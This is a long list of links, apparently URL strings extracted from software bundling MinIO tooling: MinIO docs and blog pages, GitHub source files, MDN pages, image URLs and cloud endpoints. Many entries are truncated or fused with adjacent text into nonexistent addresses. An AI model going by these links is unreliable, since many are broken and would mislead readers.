[https://github.com/go-sql-driver/mysql/wiki/strict-modeWithClientCertSour](https://github.com/go-sql-driver/mysql/wiki/strict-modeWithClientCertSour)
[https://github.com/libuv/libuv/commit/02e1ebd40b807be5af46343ea873331b2ee](https://github.com/libuv/libuv/commit/02e1ebd40b807be5af46343ea873331b2ee)
[https://github.com/moment/moment/blob/000ac1800e620f770f4eb31b5ae908f6167](https://github.com/moment/moment/blob/000ac1800e620f770f4eb31b5ae908f6167)
[https://github.com/mozilla/pdf.js/blob/d9fac3459609a807be6506fb3441b5da4b](https://github.com/mozilla/pdf.js/blob/d9fac3459609a807be6506fb3441b5da4b)
[https://github.com/reactjs/react-transition-group/blob/13435f897b3ab71f6e](https://github.com/reactjs/react-transition-group/blob/13435f897b3ab71f6e)
[https://github.com/reduxjs/redux-toolkit/blob/e85eb17b39a2118d859f7b7746e](https://github.com/reduxjs/redux-toolkit/blob/e85eb17b39a2118d859f7b7746e)
[https://github.com/syntax-tree/mdast-util-definitions/blob/8290999/index.](https://github.com/syntax-tree/mdast-util-definitions/blob/8290999/index.)
[https://github.com/zalmoxisus/remotedev-serialize/blob/master/helpers/ind](https://github.com/zalmoxisus/remotedev-serialize/blob/master/helpers/ind)
[https://github.com/zalmoxisus/remotedev-serialize/blob/master/immutable/s](https://github.com/zalmoxisus/remotedev-serialize/blob/master/immutable/s)
[https://i.ytimg.com/vi/-PjTSwLB8ZA/hqdefault.jpg?sqp=-oaymwEjCNACELwBSFry](https://i.ytimg.com/vi/-PjTSwLB8ZA/hqdefault.jpg?sqp=-oaymwEjCNACELwBSFry)
[https://i.ytimg.com/vi/0PgMxz0HauA/hqdefault.jpg?sqp=-oaymwEjCNACELwBSFry](https://i.ytimg.com/vi/0PgMxz0HauA/hqdefault.jpg?sqp=-oaymwEjCNACELwBSFry)
[https://i.ytimg.com/vi/5fz3rE3wjGg/hqdefault.jpg?sqp=-oaymwEjCNACELwBSFry](https://i.ytimg.com/vi/5fz3rE3wjGg/hqdefault.jpg?sqp=-oaymwEjCNACELwBSFry)
[https://i.ytimg.com/vi/5ptKrZzOs4c/hqdefault.jpg?sqp=-oaymwEcCNACELwBSFXy](https://i.ytimg.com/vi/5ptKrZzOs4c/hqdefault.jpg?sqp=-oaymwEcCNACELwBSFXy)
[https://i.ytimg.com/vi/89vnToCcoAw/hqdefault.jpg?sqp=-oaymwEcCNACELwBSFXy](https://i.ytimg.com/vi/89vnToCcoAw/hqdefault.jpg?sqp=-oaymwEcCNACELwBSFXy)
[https://i.ytimg.com/vi/A3vCDaFWNNs/hqdefault.jpg?sqp=-oaymwEjCNACELwBSFry](https://i.ytimg.com/vi/A3vCDaFWNNs/hqdefault.jpg?sqp=-oaymwEjCNACELwBSFry)
[https://i.ytimg.com/vi/BLTlaOvVCSg/hqdefault.jpg?sqp=-oaymwEcCNACELwBSFXy](https://i.ytimg.com/vi/BLTlaOvVCSg/hqdefault.jpg?sqp=-oaymwEcCNACELwBSFXy)
[https://i.ytimg.com/vi/CrBjB7vbI7M/hqdefault.jpg?sqp=-oaymwEcCNACELwBSFXy](https://i.ytimg.com/vi/CrBjB7vbI7M/hqdefault.jpg?sqp=-oaymwEcCNACELwBSFXy)
[https://i.ytimg.com/vi/Exg2KsfzHzI/hqdefault.jpg?sqp=-oaymwEjCNACELwBSFry](https://i.ytimg.com/vi/Exg2KsfzHzI/hqdefault.jpg?sqp=-oaymwEjCNACELwBSFry)
[https://i.ytimg.com/vi/G4wQZEsIxcU/hqdefault.jpg?sqp=-oaymwEcCNACELwBSFXy](https://i.ytimg.com/vi/G4wQZEsIxcU/hqdefault.jpg?sqp=-oaymwEcCNACELwBSFXy)
[https://i.ytimg.com/vi/Hk9Z-sltUu8/hqdefault.jpg?sqp=-oaymwEjCNACELwBSFry](https://i.ytimg.com/vi/Hk9Z-sltUu8/hqdefault.jpg?sqp=-oaymwEjCNACELwBSFry)
[https://i.ytimg.com/vi/Iz8ChZ7FRrw/hqdefault.jpg?sqp=-oaymwEcCNACELwBSFXy](https://i.ytimg.com/vi/Iz8ChZ7FRrw/hqdefault.jpg?sqp=-oaymwEcCNACELwBSFXy)
[https://i.ytimg.com/vi/KiWWVgfuulU/hqdefault.jpg?sqp=-oaymwEcCNACELwBSFXy](https://i.ytimg.com/vi/KiWWVgfuulU/hqdefault.jpg?sqp=-oaymwEcCNACELwBSFXy)
[https://i.ytimg.com/vi/Oix9iXndSUY/hqdefault.jpg?sqp=-oaymwEjCNACELwBSFry](https://i.ytimg.com/vi/Oix9iXndSUY/hqdefault.jpg?sqp=-oaymwEjCNACELwBSFry)
[https://i.ytimg.com/vi/QniHMNNmbfI/hqdefault.jpg?sqp=-oaymwEcCNACELwBSFXy](https://i.ytimg.com/vi/QniHMNNmbfI/hqdefault.jpg?sqp=-oaymwEcCNACELwBSFXy)
[https://i.ytimg.com/vi/UuxqnUgowyg/hqdefault.jpg?sqp=-oaymwEjCNACELwBSFry](https://i.ytimg.com/vi/UuxqnUgowyg/hqdefault.jpg?sqp=-oaymwEjCNACELwBSFry)
[https://i.ytimg.com/vi/XGOiwV6Cbuk/hqdefault.jpg?sqp=-oaymwEjCNACELwBSFry](https://i.ytimg.com/vi/XGOiwV6Cbuk/hqdefault.jpg?sqp=-oaymwEjCNACELwBSFry)
[https://i.ytimg.com/vi/bZsNxeuzmYc/hqdefault.jpg?sqp=-oaymwEcCNACELwBSFXy](https://i.ytimg.com/vi/bZsNxeuzmYc/hqdefault.jpg?sqp=-oaymwEcCNACELwBSFXy)
[https://i.ytimg.com/vi/dLSBuVG7Y3k/hqdefault.jpg?sqp=-oaymwEjCNACELwBSFry](https://i.ytimg.com/vi/dLSBuVG7Y3k/hqdefault.jpg?sqp=-oaymwEjCNACELwBSFry)
[https://i.ytimg.com/vi/iCxcv4_j35M/hqdefault.jpg?sqp=-oaymwEjCNACELwBSFry](https://i.ytimg.com/vi/iCxcv4_j35M/hqdefault.jpg?sqp=-oaymwEjCNACELwBSFry)
[https://i.ytimg.com/vi/nFUI2N5zH34/hqdefault.jpg?sqp=-oaymwEjCNACELwBSFry](https://i.ytimg.com/vi/nFUI2N5zH34/hqdefault.jpg?sqp=-oaymwEjCNACELwBSFry)
[https://i.ytimg.com/vi/sJEFAVqoKr0/hqdefault.jpg?sqp=-oaymwEcCNACELwBSFXy](https://i.ytimg.com/vi/sJEFAVqoKr0/hqdefault.jpg?sqp=-oaymwEcCNACELwBSFXy)
[https://i.ytimg.com/vi/thNus-DL1u4/hqdefault.jpg?sqp=-oaymwEjCNACELwBSFry](https://i.ytimg.com/vi/thNus-DL1u4/hqdefault.jpg?sqp=-oaymwEjCNACELwBSFry)
[https://i.ytimg.com/vi/vdHv9wfhu24/hqdefault.jpg?sqp=-oaymwEcCNACELwBSFXy](https://i.ytimg.com/vi/vdHv9wfhu24/hqdefault.jpg?sqp=-oaymwEcCNACELwBSFXy)
[https://i.ytimg.com/vi/z2bRoMrQxv0/hqdefault.jpg?sqp=-oaymwEcCNACELwBSFXy](https://i.ytimg.com/vi/z2bRoMrQxv0/hqdefault.jpg?sqp=-oaymwEcCNACELwBSFXy)
[https://i.ytimg.com/vi/zqjsw4O2-4U/hqdefault.jpg?sqp=-oaymwEjCNACELwBSFry](https://i.ytimg.com/vi/zqjsw4O2-4U/hqdefault.jpg?sqp=-oaymwEjCNACELwBSFry)
[https://images.unsplash.com/photo-1428660285748-340f4e33d608?crop=entropy](https://images.unsplash.com/photo-1428660285748-340f4e33d608?crop=entropy)
[https://images.unsplash.com/photo-1522932753915-9ee97e43e3d9?crop=entropy](https://images.unsplash.com/photo-1522932753915-9ee97e43e3d9?crop=entropy)
[https://images.unsplash.com/photo-1523961131990-5ea7c61b2107?crop=entropy](https://images.unsplash.com/photo-1523961131990-5ea7c61b2107?crop=entropy)
[https://images.unsplash.com/photo-1531185907801-2771c11ab782?crop=entropy](https://images.unsplash.com/photo-1531185907801-2771c11ab782?crop=entropy)
[https://images.unsplash.com/photo-1571907483086-3c0ea40cc16d?crop=entropy](https://images.unsplash.com/photo-1571907483086-3c0ea40cc16d?crop=entropy)
[https://images.unsplash.com/photo-1597386601945-8980df52c3dc?crop=entropy](https://images.unsplash.com/photo-1597386601945-8980df52c3dc?crop=entropy)
[https://images.unsplash.com/photo-1611783569248-a82ec2e72c67?crop=entropy](https://images.unsplash.com/photo-1611783569248-a82ec2e72c67?crop=entropy)
[https://management.core.cloudapi.de/cloud.google.com/go/storage.ACL.Listu](https://management.core.cloudapi.de/cloud.google.com/go/storage.ACL.Listu)
[https://min.io/docs/minio/kubernetes/upstream/administration/bucket-repli](https://min.io/docs/minio/kubernetes/upstream/administration/bucket-repli)
[https://min.io/docs/minio/kubernetes/upstream/administration/console/mana](https://min.io/docs/minio/kubernetes/upstream/administration/console/mana)
[https://min.io/docs/minio/kubernetes/upstream/administration/identity-acc](https://min.io/docs/minio/kubernetes/upstream/administration/identity-acc)
[https://min.io/docs/minio/kubernetes/upstream/administration/minio-consol](https://min.io/docs/minio/kubernetes/upstream/administration/minio-consol)
[https://min.io/docs/minio/kubernetes/upstream/administration/monitoring.h](https://min.io/docs/minio/kubernetes/upstream/administration/monitoring.h)
[https://min.io/docs/minio/kubernetes/upstream/administration/monitoring/b](https://min.io/docs/minio/kubernetes/upstream/administration/monitoring/b)
[https://min.io/docs/minio/kubernetes/upstream/administration/object-manag](https://min.io/docs/minio/kubernetes/upstream/administration/object-manag)
[https://min.io/docs/minio/kubernetes/upstream/administration/server-side-](https://min.io/docs/minio/kubernetes/upstream/administration/server-side-)
[https://min.io/docs/minio/kubernetes/upstream/operations/concepts/erasure](https://min.io/docs/minio/kubernetes/upstream/operations/concepts/erasure)
[https://min.io/docs/minio/kubernetes/upstream/operations/external-iam.htm](https://min.io/docs/minio/kubernetes/upstream/operations/external-iam.htm)
[https://min.io/docs/minio/kubernetes/upstream/operations/external-iam/con](https://min.io/docs/minio/kubernetes/upstream/operations/external-iam/con)
[https://min.io/docs/minio/kubernetes/upstream/operations/install-deploy-m](https://min.io/docs/minio/kubernetes/upstream/operations/install-deploy-m)
[https://min.io/docs/minio/kubernetes/upstream/operations/monitoring/metri](https://min.io/docs/minio/kubernetes/upstream/operations/monitoring/metri)
[https://min.io/docs/minio/kubernetes/upstream/operations/monitoring/minio](https://min.io/docs/minio/kubernetes/upstream/operations/monitoring/minio)
[https://min.io/docs/minio/kubernetes/upstream/operations/troubleshooting.](https://min.io/docs/minio/kubernetes/upstream/operations/troubleshooting.)
[https://min.io/docs/minio/kubernetes/upstream/operations/troubleshooting/](https://min.io/docs/minio/kubernetes/upstream/operations/troubleshooting/)
[https://min.io/docs/minio/linux/administration/bucket-replication.html?re](https://min.io/docs/minio/linux/administration/bucket-replication.html?re)
[https://min.io/docs/minio/linux/administration/console/security-and-acces](https://min.io/docs/minio/linux/administration/console/security-and-acces)
[https://min.io/docs/minio/linux/administration/console/subnet-registratio](https://min.io/docs/minio/linux/administration/console/subnet-registratio)
[https://min.io/docs/minio/linux/administration/identity-access-management](https://min.io/docs/minio/linux/administration/identity-access-management)
[https://min.io/docs/minio/linux/administration/monitoring/bucket-notifica](https://min.io/docs/minio/linux/administration/monitoring/bucket-notifica)
[https://min.io/docs/minio/linux/administration/monitoring/publish-events-](https://min.io/docs/minio/linux/administration/monitoring/publish-events-)
[https://min.io/docs/minio/linux/administration/object-management/object-l](https://min.io/docs/minio/linux/administration/object-management/object-l)
[https://min.io/docs/minio/linux/developers/transforms-with-object-lambda.](https://min.io/docs/minio/linux/developers/transforms-with-object-lambda.)
[https://min.io/docs/minio/linux/operations/concepts/erasure-coding.htmlfo](https://min.io/docs/minio/linux/operations/concepts/erasure-coding.htmlfo)
[https://min.io/docs/minio/linux/operations/install-deploy-manage/deploy-m](https://min.io/docs/minio/linux/operations/install-deploy-manage/deploy-m)
[https://min.io/docs/minio/linux/operations/install-deploy-manage/migrate-](https://min.io/docs/minio/linux/operations/install-deploy-manage/migrate-)
[https://min.io/docs/minio/linux/operations/install-deploy-manage/multi-si](https://min.io/docs/minio/linux/operations/install-deploy-manage/multi-si)
[https://min.io/docs/minio/linux/operations/monitoring/collect-minio-metri](https://min.io/docs/minio/linux/operations/monitoring/collect-minio-metri)
[https://min.io/docs/minio/linux/reference/minio-mc-admin/mc-admin-config.](https://min.io/docs/minio/linux/reference/minio-mc-admin/mc-admin-config.)
[https://min.io/docs/minio/linux/reference/minio-mc-admin/mc-admin-heal.ht](https://min.io/docs/minio/linux/reference/minio-mc-admin/mc-admin-heal.ht)
[https://min.io/docs/minio/macos/administration/object-management/object-r](https://min.io/docs/minio/macos/administration/object-management/object-r)
[https://min.io/docs/minio/macos/operations/install-deploy-manage/deploy-m](https://min.io/docs/minio/macos/operations/install-deploy-manage/deploy-m)
[https://min.io/docs/minio/windows/administration/console/managing-deploym](https://min.io/docs/minio/windows/administration/console/managing-deploym)
[https://min.io/docs/minio/windows/administration/object-management/object](https://min.io/docs/minio/windows/administration/object-management/object)
[https://min.io/docs/minio/windows/administration/object-management/transi](https://min.io/docs/minio/windows/administration/object-management/transi)
[https://min.io/docs/minio/windows/operations/data-recovery/recover-after-](https://min.io/docs/minio/windows/operations/data-recovery/recover-after-)
[https://min.io/docs/minio/windows/operations/monitoring/minio-logging.htm](https://min.io/docs/minio/windows/operations/monitoring/minio-logging.htm)
[https://ossrdbms-aad.database.cloudapi.decloud.google.com/go/storage.Buck](https://ossrdbms-aad.database.cloudapi.decloud.google.com/go/storage.Buck)
[https://searchfox.org/mozilla-central/rev/4a590a5a15e35d88a3b23dd6ac3c471](https://searchfox.org/mozilla-central/rev/4a590a5a15e35d88a3b23dd6ac3c471)
[https://stackoverflow.com/questions/13382516/getting-scroll-bar-width-usi](https://stackoverflow.com/questions/13382516/getting-scroll-bar-width-usi)
[https://stackoverflow.com/questions/59694142/regex-testvalue-returns-true](https://stackoverflow.com/questions/59694142/regex-testvalue-returns-true)
[https://storage.azure.com/database.usgovcloudapi.netcloudapp.usgovcloudap](https://storage.azure.com/database.usgovcloudapi.netcloudapp.usgovcloudap)
[https://vault.azure.cn/vault.microsoftazure.deRetentionExpirationTimerete](https://vault.azure.cn/vault.microsoftazure.deRetentionExpirationTimerete)
[https://vault.azure.cnazuretrafficmanager.deservicebus.cloudapi.deAZUREUS](https://vault.azure.cnazuretrafficmanager.deservicebus.cloudapi.deAZUREUS)
[https://vault.azure.netusgovtrafficmanager.netvault.usgovcloudapi.nethttp](https://vault.azure.netusgovtrafficmanager.netvault.usgovcloudapi.nethttp)
[https://www.linuxfoundation.org/hs-fs/hubfs/trademark-kubernetes-icon-cor](https://www.linuxfoundation.org/hs-fs/hubfs/trademark-kubernetes-icon-cor)
[https://github.com/minio/minio/tree/master/docs/site-replication?ref=con](https://github.com/minio/minio/tree/master/docs/site-replication?ref=con)
[https://min.io/docs/minio/kubernetes/upstream/operations/monitoring.html](https://min.io/docs/minio/kubernetes/upstream/operations/monitoring.html)
[https://min.io/docs/minio/linux/operations/monitoring/minio-logging.html](https://min.io/docs/minio/linux/operations/monitoring/minio-logging.html)
[https://min.io/docs/minio/linux/reference/minio-mc/mc-anonymous-set.html](https://min.io/docs/minio/linux/reference/minio-mc/mc-anonymous-set.html)
[https://min.io/docs/minio/linux/reference/minio-server/minio-server.html](https://min.io/docs/minio/linux/reference/minio-server/minio-server.html)
[https://min.io/docs/minio/windows/administration/bucket-replication.html](https://min.io/docs/minio/windows/administration/bucket-replication.html)
[https://stackoverflow.com/questions/588004/is-floating-point-math-broken](https://stackoverflow.com/questions/588004/is-floating-point-math-broken)
[https://cdn.jsdelivr.net/npm/redoc/bundles/redoc.standalone.jswebsocket](https://cdn.jsdelivr.net/npm/redoc/bundles/redoc.standalone.jswebsocket)
[https://cloud.google.com/docs/authentication/external/set-up-adcneither](https://cloud.google.com/docs/authentication/external/set-up-adcneither)
[https://developer.mozilla.org/en-US/docs/Web/API/File_System_Access_API](https://developer.mozilla.org/en-US/docs/Web/API/File_System_Access_API)
[https://gallery.chinacloudapi.cn/mariadb.database.chinacloudapi.cnhttps](https://gallery.chinacloudapi.cn/mariadb.database.chinacloudapi.cnhttps)
[https://html.spec.whatwg.org/multipage/form-control-infrastructure.html](https://html.spec.whatwg.org/multipage/form-control-infrastructure.html)
[https://unpkg.com/swagger-ui-dist/swagger-ui-standalone-preset.jsunable](https://unpkg.com/swagger-ui-dist/swagger-ui-standalone-preset.jsunable)
[https://blog.min.io/content/images/size/w2000/2023/10/openid-minio.jpg](https://blog.min.io/content/images/size/w2000/2023/10/openid-minio.jpg)
[https://developer.mozilla.org/en-US/docs/Web/CSS/color_value/color-mix](https://developer.mozilla.org/en-US/docs/Web/CSS/color_value/color-mix)
[https://developer.mozilla.org/en-US/docs/Web/Media/Formats/Image_types](https://developer.mozilla.org/en-US/docs/Web/Media/Formats/Image_types)
[https://github.com/cloudhead/less.js/blob/master/lib/less/functions.js](https://github.com/cloudhead/less.js/blob/master/lib/less/functions.js)
[https://github.com/infusion/jQuery-xcolor/blob/master/jquery.xcolor.js](https://github.com/infusion/jQuery-xcolor/blob/master/jquery.xcolor.js)
[https://github.com/lodash/lodash/blob/master/.internal/baseToString.js](https://github.com/lodash/lodash/blob/master/.internal/baseToString.js)
[https://images.unsplash.com/photo-1548197193-2c2df590e23f?crop=entropy](https://images.unsplash.com/photo-1548197193-2c2df590e23f?crop=entropy)
[https://min.io/docs/minio/kubernetes/upstream/operations/concepts.html](https://min.io/docs/minio/kubernetes/upstream/operations/concepts.html)
[https://blog.min.io/content/images/size/w2000/2024/01/david-blog.jpeg](https://blog.min.io/content/images/size/w2000/2024/01/david-blog.jpeg)
[https://developer.mozilla.org/en-US/docs/Web/API/DataTransferItemList](https://developer.mozilla.org/en-US/docs/Web/API/DataTransferItemList)
[https://developer.mozilla.org/en-US/docs/Web/API/FileSystemFileHandle](https://developer.mozilla.org/en-US/docs/Web/API/FileSystemFileHandle)
[https://developer.mozilla.org/en-US/docs/Web/Security/Secure_Contexts](https://developer.mozilla.org/en-US/docs/Web/Security/Secure_Contexts)
[https://github.com/amilajack/eslint-plugin-flowtype-errors/issues/133](https://github.com/amilajack/eslint-plugin-flowtype-errors/issues/133)
[https://github.com/minio/minio/tree/master/docs/erasure/storage-class](https://github.com/minio/minio/tree/master/docs/erasure/storage-class)
[https://min.io/docs/minio/linux/administration/object-management.html](https://min.io/docs/minio/linux/administration/object-management.html)
[https://min.io/docs/minio/macos/administration/object-management.html](https://min.io/docs/minio/macos/administration/object-management.html)
[https://blog.min.io/regulatory-compliance-with-minio-object-lambdas/](https://blog.min.io/regulatory-compliance-with-minio-object-lambdas/)
[https://developer.mozilla.org/en-US/docs/Web/API/FileSystemFileEntry](https://developer.mozilla.org/en-US/docs/Web/API/FileSystemFileEntry)
[https://developer.mozilla.org/en-US/docs/Web/HTML/Element/input/file](https://developer.mozilla.org/en-US/docs/Web/HTML/Element/input/file)
[https://docs.aws.amazon.com/IAM/latest/UserGuide/reference-arns.html](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference-arns.html)
[https://github.com/DefinitelyTyped/DefinitelyTyped/discussions/66042](https://github.com/DefinitelyTyped/DefinitelyTyped/discussions/66042)
[https://github.com/defunctzombie/node-process/blob/master/browser.js](https://github.com/defunctzombie/node-process/blob/master/browser.js)
[https://github.com/go-sql-driver/mysql/wiki/old_passwordsSingle-Node](https://github.com/go-sql-driver/mysql/wiki/old_passwordsSingle-Node)
[https://github.com/remix-run/history/tree/main/docs/api-reference.md](https://github.com/remix-run/history/tree/main/docs/api-reference.md)
[https://min.io/docs/minio/linux/operations/external-iam.html?ref=con](https://min.io/docs/minio/linux/operations/external-iam.html?ref=con)
[https://min.io/docs/minio/linux/reference/minio-mc/mc-quota-set.html](https://min.io/docs/minio/linux/reference/minio-mc/mc-quota-set.html)
[https://vault.usgovcloudapi.net/mysql.database.usgovcloudapi.nethttp](https://vault.usgovcloudapi.net/mysql.database.usgovcloudapi.nethttp)
[https://batch.chinacloudapi.cn/mysql.database.chinacloudapi.cnhttps](https://batch.chinacloudapi.cn/mysql.database.chinacloudapi.cnhttps)
[https://blog.min.io/content/images/size/w2000/2024/01/IMG_7378.jpeg](https://blog.min.io/content/images/size/w2000/2024/01/IMG_7378.jpeg)
[https://developer.mozilla.org/en-US/docs/Web/API/DataTransfer/items](https://developer.mozilla.org/en-US/docs/Web/API/DataTransfer/items)
[https://developer.mozilla.org/en-US/docs/Web/API/DataTransfer/types](https://developer.mozilla.org/en-US/docs/Web/API/DataTransfer/types)
[https://developer.mozilla.org/en-US/docs/Web/API/KeyboardEvent/code](https://developer.mozilla.org/en-US/docs/Web/API/KeyboardEvent/code)
[https://blog.min.io/content/images/size/w2000/2020/08/Cohasset.png](https://blog.min.io/content/images/size/w2000/2020/08/Cohasset.png)
[https://developer.mozilla.org/en-US/docs/Web/API/KeyboardEvent/key](https://developer.mozilla.org/en-US/docs/Web/API/KeyboardEvent/key)
[https://dl.min.io/client/mc/release/linux-amd64/mc.sha256sumUnable](https://dl.min.io/client/mc/release/linux-amd64/mc.sha256sumUnable)
[https://github.com/WebReflection/get-own-property-symbols/issues/4](https://github.com/WebReflection/get-own-property-symbols/issues/4)
[https://github.com/mozilla/source-map/blob/58819f0/source-map.d.ts](https://github.com/mozilla/source-map/blob/58819f0/source-map.d.ts)
[https://min.io/docs/minio/linux/operations/network-encryption.html](https://min.io/docs/minio/linux/operations/network-encryption.html)
[https://blog.min.io/continuous-data-protection-versioning-rewind/](https://blog.min.io/continuous-data-protection-versioning-rewind/)
[https://blog.min.io/object-locking-versioning-and-holds-in-minio/](https://blog.min.io/object-locking-versioning-and-holds-in-minio/)
[https://blog.min.io/object-storage-low-level-performance-testing/](https://blog.min.io/object-storage-low-level-performance-testing/)
[https://developer.mozilla.org/en-US/docs/Web/API/FileSystemHandle](https://developer.mozilla.org/en-US/docs/Web/API/FileSystemHandle)
[https://github.com/minio/minio/tree/master/docs/debugging?ref=con](https://github.com/minio/minio/tree/master/docs/debugging?ref=con)
[https://github.com/remarkjs/react-markdown/blob/main/changelog.md](https://github.com/remarkjs/react-markdown/blob/main/changelog.md)
[https://i.ytimg.com/an_webp/7EJO_iRiB2s/mqdefault_6s.webp?du=3000](https://i.ytimg.com/an_webp/7EJO_iRiB2s/mqdefault_6s.webp?du=3000)
[https://i.ytimg.com/an_webp/UGROqu7mYJs/mqdefault_6s.webp?du=3000](https://i.ytimg.com/an_webp/UGROqu7mYJs/mqdefault_6s.webp?du=3000)
[https://i.ytimg.com/an_webp/Yh_1grPSBjw/mqdefault_6s.webp?du=3000](https://i.ytimg.com/an_webp/Yh_1grPSBjw/mqdefault_6s.webp?du=3000)
[https://i.ytimg.com/an_webp/Zyc-xhNcPco/mqdefault_6s.webp?du=3000](https://i.ytimg.com/an_webp/Zyc-xhNcPco/mqdefault_6s.webp?du=3000)
[https://i.ytimg.com/an_webp/_ZEjm4bPgVI/mqdefault_6s.webp?du=3000](https://i.ytimg.com/an_webp/_ZEjm4bPgVI/mqdefault_6s.webp?du=3000)
[https://i.ytimg.com/an_webp/mv8I1wvTCrE/mqdefault_6s.webp?du=3000](https://i.ytimg.com/an_webp/mv8I1wvTCrE/mqdefault_6s.webp?du=3000)
[https://www.googleapis.com/auth/devstorage.read_writeinsufficient](https://www.googleapis.com/auth/devstorage.read_writeinsufficient)
[https://blog.min.io/stream-data-to-minio-using-kafka-kubernetes/](https://blog.min.io/stream-data-to-minio-using-kafka-kubernetes/)
[https://cldr.unicode.org/translation/date-time/date-time-symbols](https://cldr.unicode.org/translation/date-time/date-time-symbols)
[https://css-tricks.com/debouncing-throttling-explained-examples/](https://css-tricks.com/debouncing-throttling-explained-examples/)
[https://developer.mozilla.org/en-US/docs/Web/API/FileSystemEntry](https://developer.mozilla.org/en-US/docs/Web/API/FileSystemEntry)
[https://github.com/lodash/lodash/blob/master/.internal/getTag.js](https://github.com/lodash/lodash/blob/master/.internal/getTag.js)
[https://min.io/docs/minio/kubernetes/upstream/index.html?ref=con](https://min.io/docs/minio/kubernetes/upstream/index.html?ref=con)
[https://reactcommunity.org/react-transition-group/css-transition](https://reactcommunity.org/react-transition-group/css-transition)
[https://www.googleapis.com/auth/cloud-platform.read-onlyduration](https://www.googleapis.com/auth/cloud-platform.read-onlyduration)
[https://blog.min.io/minio-multi-site-active-active-replication/](https://blog.min.io/minio-multi-site-active-active-replication/)
[https://database.windows.net/postgres.database.cloudapi.dehttps](https://database.windows.net/postgres.database.cloudapi.dehttps)
[https://developer.mozilla.org/en-US/docs/Web/SVG/Attribute/type](https://developer.mozilla.org/en-US/docs/Web/SVG/Attribute/type)
[https://github.com/nodejs/node/blob/fcf8ba4/lib/internal/url.js](https://github.com/nodejs/node/blob/fcf8ba4/lib/internal/url.js)
[https://github.com/urfave/cli/blob/master/CHANGELOG.mdoperation](https://github.com/urfave/cli/blob/master/CHANGELOG.mdoperation)
[https://min.io/docs/minio/linux/operations/troubleshooting.html](https://min.io/docs/minio/linux/operations/troubleshooting.html)
[https://min.io/docs/minio/windows/operations/data-recovery.html](https://min.io/docs/minio/windows/operations/data-recovery.html)
[https://unpkg.com/swagger-ui-dist/favicon-32x32.pngadditionally](https://unpkg.com/swagger-ui-dist/favicon-32x32.pngadditionally)
[https://developer.mozilla.org/en-US/docs/Web/API/DOMException.](https://developer.mozilla.org/en-US/docs/Web/API/DOMException.)
[https://github.com/mikolalysenko/binary-search-bounds/issues/5](https://github.com/mikolalysenko/binary-search-bounds/issues/5)
[https://identity-provider-url/.well-known/openid-configuration](https://identity-provider-url/.well-known/openid-configuration)
[https://min.io/docs/minio/linux/administration/monitoring.html](https://min.io/docs/minio/linux/administration/monitoring.html)
[https://min.io/docs/minio/linux/reference/minio-mc/mc-sql.html](https://min.io/docs/minio/linux/reference/minio-mc/mc-sql.html)
[https://redux.js.org/tutorials/fundamentals/part-6-async-logic](https://redux.js.org/tutorials/fundamentals/part-6-async-logic)
[https://storage.UNIVERSE_DOMAIN/storage/v1/gccl-invocation-id/](https://storage.UNIVERSE_DOMAIN/storage/v1/gccl-invocation-id/)
[https://www.googleapis.com/auth/devstorage.full_controlstorage](https://www.googleapis.com/auth/devstorage.full_controlstorage)
[https://bugs.chromium.org/p/chromium/issues/detail?id=1025564](https://bugs.chromium.org/p/chromium/issues/detail?id=1025564)
[https://github.com/DefinitelyTyped/DefinitelyTyped/pull/55396](https://github.com/DefinitelyTyped/DefinitelyTyped/pull/55396)
[https://managedhsm.azure.netservicebus.usgovcloudapi.nethttps](https://managedhsm.azure.netservicebus.usgovcloudapi.nethttps)
[https://min.io/docs/minio/linux/reference/minio-mc/mc-du.html](https://min.io/docs/minio/linux/reference/minio-mc/mc-du.html)
[https://min.io/docs/minio/linux/reference/minio-mc/mc-mb.html](https://min.io/docs/minio/linux/reference/minio-mc/mc-mb.html)
[https://www.typescriptlang.org/docs/handbook/2/narrowing.html](https://www.typescriptlang.org/docs/handbook/2/narrowing.html)
[https://accounts.google.com/.well-known/openid-configuration](https://accounts.google.com/.well-known/openid-configuration)
[https://blog.min.io/how-do-i-know-replication-is-up-to-date/](https://blog.min.io/how-do-i-know-replication-is-up-to-date/)
[https://github.com/lodash/lodash/blob/4.17.15/dist/lodash.js](https://github.com/lodash/lodash/blob/4.17.15/dist/lodash.js)
[https://html.spec.whatwg.org/multipage/nav-history-apis.html](https://html.spec.whatwg.org/multipage/nav-history-apis.html)
[https://manage.microsoftazure.de/publishsettings/indexunable](https://manage.microsoftazure.de/publishsettings/indexunable)
[https://manage.windowsazure.com/publishsettings/indexstorage](https://manage.windowsazure.com/publishsettings/indexstorage)
[https://unpkg.com/swagger-ui-dist/swagger-ui-bundle.jsfactor](https://unpkg.com/swagger-ui-dist/swagger-ui-bundle.jsfactor)
[https://en.wikipedia.org/wiki/Free_and_open-source_software](https://en.wikipedia.org/wiki/Free_and_open-source_software)
[https://github.com/ai/nanoid/blob/3.0.2/non-secure/index.js](https://github.com/ai/nanoid/blob/3.0.2/non-secure/index.js)
[https://github.com/react-dropzone/react-dropzone/issues/276](https://github.com/react-dropzone/react-dropzone/issues/276)
[https://github.com/react-dropzone/react-dropzone/issues/450](https://github.com/react-dropzone/react-dropzone/issues/450)
[https://github.com/request/request/search?q=ESOCKETTIMEDOUT](https://github.com/request/request/search?q=ESOCKETTIMEDOUT)
[https://github.com/sdecima/javascript-detect-element-resize](https://github.com/sdecima/javascript-detect-element-resize)
[https://html.spec.whatwg.org/multipage/structured-data.html](https://html.spec.whatwg.org/multipage/structured-data.html)
[https://manage.chinacloudapi.com/publishsettings/indexhttps](https://manage.chinacloudapi.com/publishsettings/indexhttps)
[https://min.io/docs/minio/kubernetes/upstream/glossary.html](https://min.io/docs/minio/kubernetes/upstream/glossary.html)
[https://code.google.com/p/chromium/issues/detail?id=286360](https://code.google.com/p/chromium/issues/detail?id=286360)
[https://github.com/reactjs/react-transition-group/pull/749](https://github.com/reactjs/react-transition-group/pull/749)
[https://manage.windowsazure.us/publishsettings/indexfailed](https://manage.windowsazure.us/publishsettings/indexfailed)
[https://min.io/docs/minio/linux/operations/monitoring.html](https://min.io/docs/minio/linux/operations/monitoring.html)
[https://min.io/docs/minio/windows/operations/concepts.html](https://min.io/docs/minio/windows/operations/concepts.html)
[https://unpkg.com/swagger-ui-dist/swagger-ui.cssunexpected](https://unpkg.com/swagger-ui-dist/swagger-ui.cssunexpected)
[https://www.googleapis.com/auth/devstorage.read_onlyfailed](https://www.googleapis.com/auth/devstorage.read_onlyfailed)
[https://blog.min.io/complex-workflows-apache-kafka-minio/](https://blog.min.io/complex-workflows-apache-kafka-minio/)
